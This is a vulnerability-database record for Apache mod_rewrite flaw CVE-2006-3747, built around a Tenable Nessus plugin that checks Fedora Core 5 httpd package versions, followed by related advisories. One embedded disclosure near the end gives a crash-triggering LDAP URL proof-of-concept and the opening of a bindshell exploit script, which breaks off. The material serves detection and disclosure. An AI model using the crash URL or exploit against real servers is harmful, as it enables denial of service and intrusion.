ID FEDORA_2006-863.NASL Type nessus Reporter This script is Copyright (C) 2007-2021 Tenable Network Security, Inc. Modified 2007-01-17T00:00:00
Description
This update fixes a security issue in the mod_rewrite module.
Mark Dowd of McAfee Avert Labs reported an off-by-one security problem
in the LDAP scheme handling of the mod_rewrite module. Where
RewriteEngine was enabled, and for certain RewriteRules, this could
lead to a pointer being written out of bounds. (CVE-2006-3747)
The ability to exploit this issue is dependent on the stack layout for
a particular compiled version of mod_rewrite. The Fedora project has
analyzed Fedora Core 4 and 5 binaries and determined that these
distributions are vulnerable to this issue. However this flaw does not
affect a default installation of Fedora Core; users who do not use, or
have not enabled, the Rewrite module are not affected by this issue.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2006-863.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(24162);
script_version("1.17");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");
script_xref(name:"FEDORA", value:"2006-863");
script_name(english:"Fedora Core 5 : httpd-2.2.2-1.2 (2006-863)");
script_summary(english:"Checks rpm output for the updated packages.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora Core host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"This update fixes a security issue in the mod_rewrite module.
Mark Dowd of McAfee Avert Labs reported an off-by-one security problem
in the LDAP scheme handling of the mod_rewrite module. Where
RewriteEngine was enabled, and for certain RewriteRules, this could
lead to a pointer being written out of bounds. (CVE-2006-3747)
The ability to exploit this issue is dependent on the stack layout for
a particular compiled version of mod_rewrite. The Fedora project has
analyzed Fedora Core 4 and 5 binaries and determined that these
distributions are vulnerable to this issue. However this flaw does not
affect a default installation of Fedora Core; users who do not use, or
have not enabled, the Rewrite module are not affected by this issue.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
# https://lists.fedoraproject.org/pipermail/package-announce/2006-July/000463.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?90802964"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
script_set_attribute(attribute:"risk_factor", value:"High");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:httpd");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:httpd-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:httpd-manual");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:mod_ssl");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora_core:5");
script_set_attribute(attribute:"patch_publication_date", value:"2006/07/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2007/01/17");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 5.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC5", reference:"httpd-2.2.2-1.2")) flag++;
if (rpm_check(release:"FC5", reference:"httpd-debuginfo-2.2.2-1.2")) flag++;
if (rpm_check(release:"FC5", reference:"httpd-devel-2.2.2-1.2")) flag++;
if (rpm_check(release:"FC5", reference:"httpd-manual-2.2.2-1.2")) flag++;
if (rpm_check(release:"FC5", reference:"mod_ssl-2.2.2-1.2")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl");
}
{"id": "FEDORA_2006-863.NASL", "bulletinFamily": "scanner", "title": "Fedora Core 5 : httpd-2.2.2-1.2 (2006-863)", "description": "This update fixes a security issue in the mod_rewrite module.\n\nMark Dowd of McAfee Avert Labs reported an off-by-one security problem\nin the LDAP scheme handling of the mod_rewrite module. Where\nRewriteEngine was enabled, and for certain RewriteRules, this could\nlead to a pointer being written out of bounds. (CVE-2006-3747)\n\nThe ability to exploit this issue is dependent on the stack layout for\na particular compiled version of mod_rewrite. The Fedora project has\nanalyzed Fedora Core 4 and 5 binaries and determined that these\ndistributions are vulnerable to this issue. However this flaw does not\naffect a default installation of Fedora Core; users who do not use, or\nhave not enabled, the Rewrite module are not affected by this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2007-01-17T00:00:00", "modified": "2007-01-17T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/24162", "reporter": "This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.", "references": ["http://www.nessus.org/u?90802964"], "cvelist": ["CVE-2006-3747"], "type": "nessus", "lastseen": "2021-01-12T10:06:00", "edition": 22, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3747"]}, {"type": "f5", "idList": ["F5:K6878", "SOL6878"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13661", "SECURITYVULNS:DOC:13975", "SECURITYVULNS:DOC:13673"]}, {"type": "osvdb", "idList": ["OSVDB:27588"]}, {"type": "seebug", "idList": ["SSV:6610", "SSV:429", "SSV:63874", "SSV:16391"]}, {"type": "slackware", "idList": ["SSA-2006-209-01"]}, {"type": "saint", "idList": ["SAINT:35A5AA91DCF68555669689272BFFD3E7", "SAINT:386ECCECD3AA34FA1E84E6D3D2B71C7B", "SAINT:B572402CE6E5C851D7572BF044507A14"]}, {"type": "nessus", "idList": ["SUSE_APACHE2-1905.NASL", "FREEBSD_PKG_DC8C08C71E7C11DB88CF000C6EC775D9.NASL", "DEBIAN_DSA-1131.NASL", "GENTOO_GLSA-200608-01.NASL", "UBUNTU_USN-328-1.NASL", "DEBIAN_DSA-1132.NASL", "SLACKWARE_SSA_2006-209-01.NASL", "APACHE_1_3_37.NASL", "APACHE_2_0_59.NASL", "FEDORA_2006-862.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:57201", "OPENVAS:136141256231057168", "OPENVAS:57851", "OPENVAS:57145", "OPENVAS:57200", "OPENVAS:65142", "OPENVAS:136141256231065309", "OPENVAS:57168", "OPENVAS:65309", "OPENVAS:136141256231065142"]}, {"type": "exploitdb", "idList": ["EDB-ID:3996", "EDB-ID:16752", "EDB-ID:3680", "EDB-ID:2237"]}, {"type": "httpd", "idList": ["HTTPD:72F2F52813642A1A16F01F74291257B4", "HTTPD:6C9DAB876E616F2E0DD054F6CAEC074D", "HTTPD:926B81EFA0651C6A6A14D204526A10AC", "HTTPD:0D1550F3E416AE3560367A9812052A33"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:55727", "PACKETSTORM:83108", "PACKETSTORM:56989", "PACKETSTORM:62377", "PACKETSTORM:49400"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8FEEBCD1B617ED74B8D2179061252A44", "EXPLOITPACK:6E3090CD46CEEE08D52992589E824D90"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1132-1:6E37C", "DEBIAN:DSA-1131-1:123B5"]}, {"type": "freebsd", "idList": ["DC8C08C7-1E7C-11DB-88CF-000C6EC775D9"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/APACHE_MOD_REWRITE_LDAP"]}, {"type": "gentoo", "idList": ["GLSA-200608-01"]}, {"type": "ubuntu", "idList": ["USN-328-1"]}, {"type": "suse", "idList": ["SUSE-SA:2006:043"]}, {"type": "cert", "idList": ["VU:395412"]}, {"type": "fedora", "idList": ["FEDORA:L62F1CGQ016053"]}], "modified": "2021-01-12T10:06:00", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-01-12T10:06:00", "rev": 2}, "vulnersScore": 7.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-863.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24162);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-863\");\n\n script_name(english:\"Fedora Core 5 : httpd-2.2.2-1.2 (2006-863)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a security issue in the mod_rewrite module.\n\nMark Dowd of McAfee Avert Labs reported an off-by-one security problem\nin the LDAP scheme handling of the mod_rewrite module. Where\nRewriteEngine was enabled, and for certain RewriteRules, this could\nlead to a pointer being written out of bounds. (CVE-2006-3747)\n\nThe ability to exploit this issue is dependent on the stack layout for\na particular compiled version of mod_rewrite. The Fedora project has\nanalyzed Fedora Core 4 and 5 binaries and determined that these\ndistributions are vulnerable to this issue. However this flaw does not\naffect a default installation of Fedora Core; users who do not use, or\nhave not enabled, the Rewrite module are not affected by this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-July/000463.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90802964\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 5.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC5\", reference:\"httpd-2.2.2-1.2\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"httpd-debuginfo-2.2.2-1.2\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"httpd-devel-2.2.2-1.2\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"httpd-manual-2.2.2-1.2\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mod_ssl-2.2.2-1.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "24162", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "p-cpe:/a:fedoraproject:fedora:httpd-devel", "p-cpe:/a:fedoraproject:fedora:httpd-manual", "cpe:/o:fedoraproject:fedora_core:5", "p-cpe:/a:fedoraproject:fedora:httpd-debuginfo", "p-cpe:/a:fedoraproject:fedora:mod_ssl"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:48:16", "description": "Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.", "edition": 5, "cvss3": {}, "published": "2006-07-28T18:02:00", "title": "CVE-2006-3747", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3747"], "modified": "2018-10-17T21:29:00", "cpe": ["cpe:/a:apache:http_server:1.3.33", "cpe:/a:apache:http_server:1.3.3", "cpe:/a:apache:http_server:2.0.56", "cpe:/a:apache:http_server:2.0.49", "cpe:/a:apache:http_server:2.0.53", "cpe:/a:apache:http_server:2.0.50", "cpe:/o:ubuntu:ubuntu_linux:6.06_lts", "cpe:/a:apache:http_server:2.0.58", "cpe:/a:apache:http_server:1.3.6", "cpe:/a:apache:http_server:1.3.30", "cpe:/a:apache:http_server:2.0.55", "cpe:/a:apache:http_server:2.0.57", "cpe:/a:apache:http_server:1.3.28", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:apache:http_server:2.0.46", "cpe:/a:apache:http_server:1.3.5", "cpe:/a:apache:http_server:1.3.4", "cpe:/a:apache:http_server:1.3.7", "cpe:/a:apache:http_server:1.3.8", "cpe:/o:ubuntu:ubuntu_linux:5.10", "cpe:/a:apache:http_server:1.3.31", "cpe:/a:apache:http_server:2.0.54", "cpe:/a:apache:http_server:1.3.32", "cpe:/a:apache:http_server:2.0.47", "cpe:/a:apache:http_server:1.3.29", "cpe:/a:apache:http_server:2.0.52", "cpe:/o:ubuntu:ubuntu_linux:5.04", "cpe:/a:apache:http_server:2.0.51", "cpe:/a:apache:http_server:1.3.9"], "id": "CVE-2006-3747", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3747", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:http_server:1.3.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:5.04:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.53:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.57:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:6.06_lts:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.58:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.7:*:dev:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.55:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-10-12T02:11:16", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "edition": 1, "description": "", "modified": "2016-01-09T02:26:00", "published": "2007-05-17T04:00:00", "href": "https://support.f5.com/csp/article/K6878", "id": "F5:K6878", "title": "Apache Rewrite module (mod_rewrite) vulnerabilities CVE-2006-3747", "type": "f5", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:16", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "edition": 1, "description": "This security advisory describes an off-by-one error, which means the bits are shifted to the left or the right by one value, in the LDAP scheme handling of the Apache Rewrite module. The vulnerability within the Apache Rewrite module allows remote attackers to cause a Denial of Service attack or use rewrite rules to add arbitrary code into URLs that the Apache Rewrite module did not handle correctly.\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747>\n", "modified": "2013-03-19T00:00:00", "published": "2007-05-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/6000/800/sol6878.html", "id": "SOL6878", "title": "SOL6878 - Apache Rewrite module (mod_rewrite) vulnerabilities CVE-2006-3747", "type": "f5", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\r\n Apache HTTP Server 2.2.3 Released\r\n\r\nThe Apache Software Foundation and The Apache HTTP Server Project are\r\npleased to announce the release of version 2.2.3 of the Apache HTTP Server\r\n("Apache").\r\n\r\nThis version of Apache is principally a bug and security fix release. The\r\nfollowing potential security flaws are addressed;\r\n\r\n CVE-2006-3747: An off-by-one flaw exists in the Rewrite module,\r\n mod_rewrite, as shipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46,\r\n and 2.2 since 2.2.0.\r\n\r\nDepending on the manner in which Apache HTTP Server was compiled, this\r\nsoftware defect may result in a vulnerability which, in combination with\r\ncertain types of Rewrite rules in the web server configuration files,\r\ncould be triggered remotely. For vulnerable builds, the nature of the\r\nvulnerability can be denial of service (crashing of web server processes)\r\nor potentially allow arbitrary code execution. This issue has been rated\r\nas having important security impact by the Apache HTTP Server Security\r\nTeam.\r\n\r\nThis flaw does not affect a default installation of Apache HTTP Server.\r\nUsers who do not use, or have not enabled, the Rewrite module mod_rewrite\r\nare not affected by this issue. This issue only affects installations\r\nusing a Rewrite rule with the following characteristics:\r\n\r\n * The RewriteRule allows the attacker to control the initial part of the\r\n rewritten URL (for example if the substitution URL starts with $1)\r\n * The RewriteRule flags do NOT include any of the following flags:\r\n Forbidden (F), Gone (G), or NoEscape (NE).\r\n\r\nPlease note that ability to exploit this issue is dependent on the stack\r\nlayout for a particular compiled version of mod_rewrite. If the compiler\r\nused to compile Apache HTTP Server has added padding to the stack\r\nimmediately after the buffer being overwritten, it will not be possible to\r\nexploit this issue, and Apache HTTP Server will continue operating\r\nnormally.\r\n\r\nThe Apache HTTP Server project recommends that all users who have built\r\nApache from source apply the patch or upgrade to the latest level and\r\nrebuild. Providers of Apache-based web servers in pre-compiled form will\r\nbe able to determine if this vulnerability applies to their builds. That\r\ndetermination has no bearing on any other builds of Apache HTTP Server,\r\nand Apache HTTP Server users are urged to exercise caution and apply\r\npatches or upgrade unless they have specific instructions from the\r\nprovider of their web server. Statements from vendors can be obtained from\r\nthe US-CERT vulnerability note for this issue at:\r\n\r\n http://www.kb.cert.org/vuls/id/395412\r\n\r\nThe Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs for\r\nthe responsible reporting of this vulnerability.\r\n\r\nWe consider this release to be the best version of Apache available, and\r\nencourage users of all prior versions to upgrade.\r\n\r\nApache HTTP Server 2.2.3 is available for download from:\r\n\r\n http://httpd.apache.org/download.cgi\r\n\r\nApache 2.2 offers numerous enhancements, improvements, and performance\r\nboosts over the 2.0 codebase. For an overview of new features introduced\r\nsince 2.0 please see:\r\n\r\n http://httpd.apache.org/docs/2.2/new_features_2_2.html\r\n\r\nPlease see the CHANGES_2.2 file, linked from the download page, for a full\r\nlist of changes.\r\n\r\nApache HTTP Server 1.3.37 and 2.0.59 legacy releases are also available\r\nwith this security fix. See the appropriate CHANGES from the url above.\r\nThe Apache HTTP Project developers strongly encourage all users to\r\nmigrate to Apache 2.2, as only limited maintenance is performed on these\r\nlegacy versions.\r\n\r\nThis release includes the Apache Portable Runtime (APR) version 1.2.7\r\nbundled with the tar and zip distributions. The APR libraries libapr,\r\nlibaprutil, and (on Win32) libapriconv must all be updated to ensure\r\nbinary compatibility and address many known platform bugs.\r\n\r\nThis release builds on and extends the Apache 2.0 API. Modules written for\r\nApache 2.0 will need to be recompiled in order to run with Apache 2.2, but\r\nno substantial reworking should be necessary.\r\n\r\n http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/VERSIONING\r\n\r\nWhen upgrading or installing this version of Apache, please bear in mind\r\nthat if you intend to use Apache with one of the threaded MPMs, you must\r\nensure that any modules you will be using (and the libraries they depend\r\non) are thread-safe.\r\n\r\n\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:DOC:13673", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13673", "title": "[Full-disclosure] [Announcement] Apache HTTP Server 2.2.3 (2.0.59, 1.3.37) Released", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\r\nPublic release date of POC/Exploit: 2006-08-20\r\nAuthor: Jacobo Avariento Gimeno\r\nCVE id: CVE-2006-3747\r\nBugtraq id: 19204\r\nCERT advisory: VU#395412\r\nSeverity: high\r\n\r\n\r\nIntroduction\r\n----\r\nOn July 28 2006 Mark Dowd (McAfee Avert Labs) reported a vulnerability\r\nfound in mod_rewrite apache module to the bugtraq mailing list.\r\nThe vulnerable function is escape_absolute_uri() and the problem only\r\ncould be arised when mod_rewrite is dealing with an LDAP URL, a\r\nmalformed LDAP URL could trigger an off-by-one overflow in certain\r\n(special) situations and a possible attacker could cause a\r\ndenial-of-service or execute arbitrary code with the privileges of\r\nthe apache user.\r\nTo exploit this vulnerability isn't necessary an LDAP-specific rule,\r\nbut must have a rule which the user can control the inital part of the\r\nremapped URL, i.e.: \r\n\r\nRewriteRule foo/(.*) $1\r\n\r\nAny version of the Apache HTTP server:\r\n * 1.3 branch: >1.3.28 and <1.3.37\r\n * 2.0 branch: >2.0.46 and <2.0.59\r\n * 2.2 branch: >2.2.0 and <2.2.3\r\nis vulnerable.\r\n\r\n\r\nAnalysis of the vulnerable code\r\n----\r\n\r\n 2696 /* escape absolute uri, which may or may not be path oriented.\r\n 2697 * So let's handle them differently.\r\n 2698 */\r\n 2699 static char *escape_absolute_uri(ap_pool *p, char *uri,\r\nunsigned scheme) \r\n 2700 {\r\n 2701 char *cp;\r\n 2702 ...\r\n ...\r\n 2727 /* special thing for ldap.\r\n 2728 * The parts are separated by question marks. From RFC 2255: \r\n 2729 * ldapurl = scheme "://" [hostport] ["/"\r\n 2730 * [dn ["?" [attributes] ["?" [scope]\r\n 2731 * ["?" [filter] ["?" extensions]]]]]]\r\n 2732 */ \r\n 2733 if (!strncasecmp(uri, "ldap", 4)) {\r\n 2734 char *token[5];\r\n 2735 int c = 0;\r\n 2736 \r\n 2737 token[0] = cp = ap_pstrdup(p, cp);\r\n 2738 while (*cp && c < 5) {\r\n 2739 if (*cp == '?') {\r\n 2740 token[++c] = cp + 1;\r\n 2741 *cp = '\0';\r\n 2742 }\r\n 2743 ++cp;\r\n 2744 }\r\n\r\nIn the case that an LDAP URI contains a fifth '?' the line 2740 causes\r\nan off-by-one overflow, it's writing in token[5].\r\nTo exploit this problem is necessary a vulnerable apache version and a\r\nspecific stack frame layout.\r\n\r\nProof of concept\r\n----\r\n\r\nTo know if your apache vulnerable version could be successful\r\nexploited, write this rule in your httpd.conf or .htaccess file:\r\n\r\nRewriteRule kung/(.*) $1\r\n\r\nAnd try to access to the following URL:\r\n/kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA%\r\n3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB\r\n\r\nIf your web server doesn't reply you with a '302 Found' page or a\r\nSegmentation Fault appears in your error_log, an apache child has\r\ncrashed and your web server is vulnerable and exploitable.\r\n\r\nExploit\r\n----\r\n\r\nThis exploit was successful executed on Apache 1.3.34, debian\r\nsarge package:\r\n\r\n#!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one.\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n# \r\n# by jack <jack\x40gulcas\x2Eorg>\r\n# 2006-08-20\r\n#\r\n# Thx to xuso for help me with the shellcode.\r\n#\r\n# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not\r\n# you must recalculate adressess.\r\n#\r\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\r\n# for avoiding apache url-escape.. Take a look is quite nice ;)\r\n#\r\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\r\n# 0x0834ae77 for any other version/system find it.\r\n#\r\n# Gulcas rulez :P\r\n\r\necho -e "mod_rewrite apache off-by-one overflow\nby jack <jack\x40gulcas\r\n\x2eorg>\n\n"\r\n\r\nif [ $# -ne 1 ] ; then\r\n echo "Usage: $0 webserver"\r\n 